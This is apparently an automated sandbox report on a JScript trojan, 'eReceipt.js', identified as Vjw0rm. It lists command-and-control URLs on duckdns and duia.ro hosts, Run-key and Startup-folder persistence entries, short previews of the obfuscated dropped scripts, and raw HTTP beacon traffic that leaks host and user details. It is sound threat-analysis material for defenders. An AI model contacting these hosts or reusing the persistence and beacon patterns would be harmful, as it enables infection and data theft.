http://zeegod.duckdns.org:9003/VreMcroWinows | wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Vre5( | wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreS~1 | wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreW&&1 | wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vre% | wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098VreMcroWinows | wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827815477.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.881255255.00000280C91ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.880832784.00000171E0417000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreICAgICAgICAgICAgIC | wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vre | wscript.exe, 00000012.00000002.880111499.0000026BB17E2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098Vreosoft | wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org/ | wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreMcroWinowsu | wscript.exe, 00000001.00000002.881083256.000001FE4248F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/Vre?Lw | wscript.exe, 00000009.00000002.881854049.0000011D6D8E9000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Vre# | wscript.exe, 00000005.00000003.815093819.000001B3A057A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.883135127.000001B3A057D000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Vre0 | wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreMH | wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreMcroWinowsC | wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreMcroWinowsiniF | wscript.exe, 0000000A.00000002.880775140.00000239F8B9C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098VreMcroWinowsiniG | wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098Vre7E9B0-70EF-11D1-B75A-00A0C90564FE | wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/Vre5 | wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vrei | wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/Vre2 | wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vre783C6-CB41-11D1-8B02-00600806D9B6 | wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098 | wscript.exe, 00000012.00000002.881139684.0000026BB35D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879936544.0000026BB17B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.879648858.000000D426DC1000.00000004.00000010.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://zeegod.duckdns.org:9003/VreMcroWinows1 | wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Vreuc3BsaXQo | wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vrer | wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098Vrep | wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098VreMicrosoft | wscript.exe, 0000000C.00000002.881056298.00000171E0430000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098VreZ | wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098VreY | wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreB | wscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Ag | wscript.exe, 00000000.00000003.354426581.000001C6DCBAD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.354234861.000001C6DCBAC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.881556438.000001C6DCBAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.458352994.00000244AF37E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.881936001.00000244AF37E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vree | wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreM | wscript.exe, 00000005.00000002.883505845.000001B3A05C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.881803714.0000011D6D8B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883452838.00000244AF4E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.879910035.00000244AD532000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098Vrea | wscript.exe, 00000007.00000002.881546053.00000280C921B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.827671805.00000280C9218000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreJ | wscript.exe, 00000009.00000002.882763356.0000011D6E4A0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreM | wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/VreT | wscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreWOW64 | wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.880223665.000001C979E1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.880995729.00000239F8BE0000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098Vref: | wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/ | wscript.exe, 00000010.00000002.884207305.00000244AFE70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.457112240.00000244AF413000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreM8 | wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://travcharles.duia.ro:5098Vreosoft.xmldom | wscript.exe, 00000001.00000002.880864667.000001FE4244C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://zeegod.duckdns.org:9003/Vre798AD7C45B15A | wscript.exe, 00000009.00000002.883203781.0000011D6E515000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org/telPROCESSOR_LEVEL=6PROCESSOR_RC | wscript.exe, 00000000.00000002.882808280.000001C6DD8AC000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/Vre0& | wscript.exe, 00000010.00000002.882947687.00000244AF47E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://travcharles.duia.ro:5098VreE | wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp | true | | low
http://zeegod.duckdns.org:9003/Vreo | wscript.exe, 00000005.00000003.814806136.000001B3A1155000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814853193.000001B3A1161000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.814903129.000001B3A1167000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://zeegod.duckdns.org:9003/VrebiBuZXcgQWN0aXZlWE | wscript.exe, 00000000.00000002.881896029.000001C6DCCF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
        http://zeegod.duckdns.org:9003/Vre7DQpmb3Igwscript.exe, 00000005.00000002.884283434.000001B3A0DF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.882515571.0000011D6E1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000002.883937570.00000244AFD70000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        http://zeegod.duckdns.org:9003/Vremwscript.exe, 00000000.00000002.881792524.000001C6DCC84000.00000004.00000020.00020000.00000000.sdmptrue
          unknown
          http://zeegod.duckdns.org:9003/Vreba&wscript.exe, 00000010.00000002.884362520.00000244B00A8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://zeegod.duckdns.org:9003/VreenPwscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://zeegod.duckdns.org:9003/Vre5BPwscript.exe, 00000005.00000002.884584250.000001B3A1169000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://travcharles.duia.ro:5098Vre563209-4053062332-100wscript.exe, 00000001.00000002.882158430.000001FE44A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.881172921.000001C97BE80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.882890634.00000280CB850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.881999035.00000239FAD10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000012.00000002.881266863.0000026BB3900000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          low
          http://zeegod.duckdns.org:9003/Vreswscript.exe, 00000000.00000002.882571223.000001C6DD870000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://travcharles.duia.ro:5098Vre0wscript.exe, 00000001.00000002.881152946.000001FE424AE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.881519996.00000171E2B20000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          low
          http://zeegod.duckdns.org:9003/Vre-zwscript.exe, 00000005.00000002.884039179.000001B3A0690000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
212.193.30.129 | zeegod.duckdns.org | Russian Federation | 57844 | SPD-NETTR | true
IP: 192.168.2.1
          Joe Sandbox Version:34.0.0 Boulder Opal
          Analysis ID:628800
Start date and time: 2022-05-17 23:08:26 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 1s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:eReceipt.js
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • GSI enabled (Javascript)
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.expl.evad.winJS@15/6@4/2
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .js
          • Adjust boot time
          • Enable AMSI
          • Override analysis time to 240s for JS/VBS files not yet terminated
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed; report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
23:09:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR "C:\Users\user\AppData\Roaming\eReceipt.js"
23:09:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
23:10:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1NBCD3W1VR "C:\Users\user\AppData\Roaming\eReceipt.js"
23:10:08 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 00FAYTSXGU "C:\Users\user\AppData\Roaming\XZqsVjnTsr.js"
23:10:17 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eReceipt.js
23:10:25 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XZqsVjnTsr.js
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):21357
            Entropy (8bit):5.2894011150794435
            Encrypted:false
            SSDEEP:384:4HODRv2Svqnusx24EsLEtidkVdIa1bwp/Ehobu+5Tbwp/B3P0:Kk2snsxUr+e3P0
            MD5:9680A56E1D5253816FE0207732F4E9CB
            SHA1:89521E7838484A7417B1F1E2C24F08248A2CF6CD
            SHA-256:36CFA283F600288D1B5D4037A32AAD1163FC4F2CCCF4193A5A9580221FA7320D
            SHA-512:7BE37792E490BF33683B414565177CA7E9A906A0A03AC81EA50CCB30EE480E519F4D7165A4D92351AAC12C014260DDE15BEFA14E9BCB9C6B74480F40FEC1209A
            Malicious:true
            Preview:+(!Array.prototype.forEach ? Array.prototype.forEach = function (callback, thisArg) {. thisArg = thisArg;. for (var i = 0; i < this.length; i++) {. callback.call(thisArg, this[i], i, this);. }.} : 0, !Array.prototype.map ? Array.prototype.map = function (callback, thisArg) {. thisArg = thisArg;. var array = [];. for (var i = 0; i < this.length; i++) {. array.push(callback.call(thisArg, this[i], i, this));. }. return array;.} : 0, !Array.prototype.reduce ? Array.prototype.reduce = function (fn, initial) {. var values = this;. if (typeof initial === '\x75\x6e\x64\x65\x66\x69\x6e\x65\x64') {. initial = 0;. }. values.forEach(function (item, index) {. initial = fn(initial, item, index, this);. });. return initial;.} : 0);.function cushDevener$$$_() {. var __p_7718723007 = false;. if (__p_7718723007) {. function curCSS(elem, name, computed) {. var ret;. computed = computed || getStyles(el
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with very long lines
            Category:dropped
            Size (bytes):72418
            Entropy (8bit):5.8225967963556124
            Encrypted:false
            SSDEEP:1536:fLjCsEaCSsH70UPi7qzBeIqwitzYNJO4b4aA7pbN:ODfXBeIqwitzYXt4zL
            MD5:251F5F194692E3005FC3C7FF65245703
            SHA1:A783B3612C72FDA8BEBA978B64355CF55BEB9207
            SHA-256:E0E97169CE4F633BE2AB44AE97C5B6D9D23B3C8B0BB99D4EBF6D82E449B08025
            SHA-512:B66EC42775B30DCC946D91E593E084AD739AABA1D512EE8E496D234E32FDA34D5AA7F543EC6C1AC6FA66336F54553F4994D99457E1920E3CB4D3670D3B1CD0C4
            Malicious:true
            Preview:. function jbxlog() {. var str = ""; . try . {. for ( var i = 0 ; i < arguments.length ; i ++ ). {. var argKey = arguments[i][0]; . var argValue = arguments[i][1]; . var str2 = ""; . {. if ( argKey == "entry" ) . {. var info = jbxlog.countDic[argValue];. if (info === undefined). {. info = jbxlog.countDic[argValue] = { "totEntry": 1, "remEntry": jbxlog.countLimit - 1, "totExit": 0, "remExit": jbxlog.countLimit };. } else. {. info["totEntry"]++;. var remEntry = info["remEntry"] > 0 ? info["remEntry"]-- : 0;. if (remEntry === 0). {. return;. }. }. } else if ( argKey == "exit" ). {. var info = jbxlog.countDic[argValue];. if (info !== undefined). {. var to
            Process:C:\Windows\System32\wscript.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            File type:ASCII text, with very long lines
            Entropy (8bit):5.7986864588558165
            TrID:
              File name:eReceipt.js
              File size:60355
              MD5:00073a5b3551f0759bf070f9954c96c0
              SHA1:c68e16991a3453fc8a33abe802421830efaa1fec
              SHA256:c8238e4ba5d2aafcb132239f682f11ba67387adc8abc80ac0614d3dbe3634e6d
              SHA512:197fd434e1855359afab435997b31f30996bc62e45d9536a2e1f11f221a990c228ead9a653109f8b91b4ab26a25c9392503ae7b2ecbeb30b764eeecff00f61a4
              SSDEEP:1536:KsCSsH70UPi7qzBeIqwitzYNJO4b4aA0f0:ODfXBeIqwitzYXt4Mc
              TLSH:3D43E5DC6E64E4AFC964983A7C3A6CCA47B45A1B8454D7CE781F72405BB8306CBDD06C
              File Content Preview:+(!Array.prototype.forEach ? Array.prototype.forEach = function (callback, thisArg) {. thisArg = thisArg;. for (var i = 0; i < this.length; i++) {. callback.call(thisArg, this[i], i, this);. }.} : 0, !Array.prototype.map ? Array.prototype.
              Icon Hash:e8d69ece968a9ec4
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/17/22-23:13:15.273410 | TCP | 2828283 | ETPRO TROJAN VJworm Checkin | 49772 | 9003 | 192.168.2.7 | 212.193.30.129
05/17/22-23:10:33.772326 | TCP | 2828283 | ETPRO TROJAN VJworm Checkin | 49762 | 9003 | 192.168.2.7 | 212.193.30.129
05/17/22-23:13:30.858787 | TCP | 2828283 | ETPRO TROJAN VJworm Checkin | 49788 | 9003 | 192.168.2.7 | 212.193.30.129
05/17/22-23:13:08.959758 | TCP | 2828283 | ETPRO TROJAN VJworm Checkin | 49781 | 9003 | 192.168.2.7 | 212.193.30.129
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 17, 2022 23:09:43.419167995 CEST | 192.168.2.7 | 8.8.8.8 | 0x4f54 | Standard query (0) | zeegod.duckdns.org | A (IP address) | IN (0x0001)
May 17, 2022 23:09:59.995547056 CEST | 192.168.2.7 | 8.8.8.8 | 0x880 | Standard query (0) | zeegod.duckdns.org | A (IP address) | IN (0x0001)
May 17, 2022 23:10:18.895708084 CEST | 192.168.2.7 | 8.8.8.8 | 0xe6c2 | Standard query (0) | zeegod.duckdns.org | A (IP address) | IN (0x0001)
May 17, 2022 23:10:34.730025053 CEST | 192.168.2.7 | 8.8.8.8 | 0x67f1 | Standard query (0) | zeegod.duckdns.org | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 17, 2022 23:09:43.527143002 CEST | 8.8.8.8 | 192.168.2.7 | 0x4f54 | No error (0) | zeegod.duckdns.org | - | 212.193.30.129 | A (IP address) | IN (0x0001)
May 17, 2022 23:10:00.105016947 CEST | 8.8.8.8 | 192.168.2.7 | 0x880 | No error (0) | zeegod.duckdns.org | - | 212.193.30.129 | A (IP address) | IN (0x0001)
May 17, 2022 23:10:19.005278111 CEST | 8.8.8.8 | 192.168.2.7 | 0xe6c2 | No error (0) | zeegod.duckdns.org | - | 212.193.30.129 | A (IP address) | IN (0x0001)
May 17, 2022 23:10:34.836256981 CEST | 8.8.8.8 | 192.168.2.7 | 0x67f1 | No error (0) | zeegod.duckdns.org | - | 212.193.30.129 | A (IP address) | IN (0x0001)
              • zeegod.duckdns.org:9003
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49762 | 212.193.30.129 | 9003 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
May 17, 2022 23:09:43.600795984 CEST | 679 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
May 17, 2022 23:09:58.479193926 CEST | 1139 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:09:57 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
May 17, 2022 23:10:05.678009987 CEST | 1140 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
May 17, 2022 23:10:26.567811966 CEST | 1271 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:26 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
May 17, 2022 23:10:33.772325993 CEST | 1331 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49772 | 212.193.30.129 | 9003 | C:\Windows\System32\wscript.exe
Timestamp | kBytes transferred | Direction | Data
May 17, 2022 23:10:00.158965111 CEST | 1140 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:20.556592941 CEST | 1257 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:20 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:27.670526028 CEST | 1272 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: zeegod.duckdns.org:9003
              Content-Length: 0
              Connection: Keep-Alive
              Cache-Control: no-cache
              May 17, 2022 23:10:46.696969986 CEST | 10133 | IN | HTTP/1.1 200 OK
              Transfer-Encoding: chunked
              Server: Microsoft-HTTPAPI/2.0
              Date: Tue, 17 May 2022 21:10:46 GMT
              Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              May 17, 2022 23:10:53.851820946 CEST | 12088 | OUT | POST /Vre HTTP/1.1
              Accept: */*
              User-Agent: vjw0rm_0453C53E\computer\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\
              Accept-Language: en-us
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
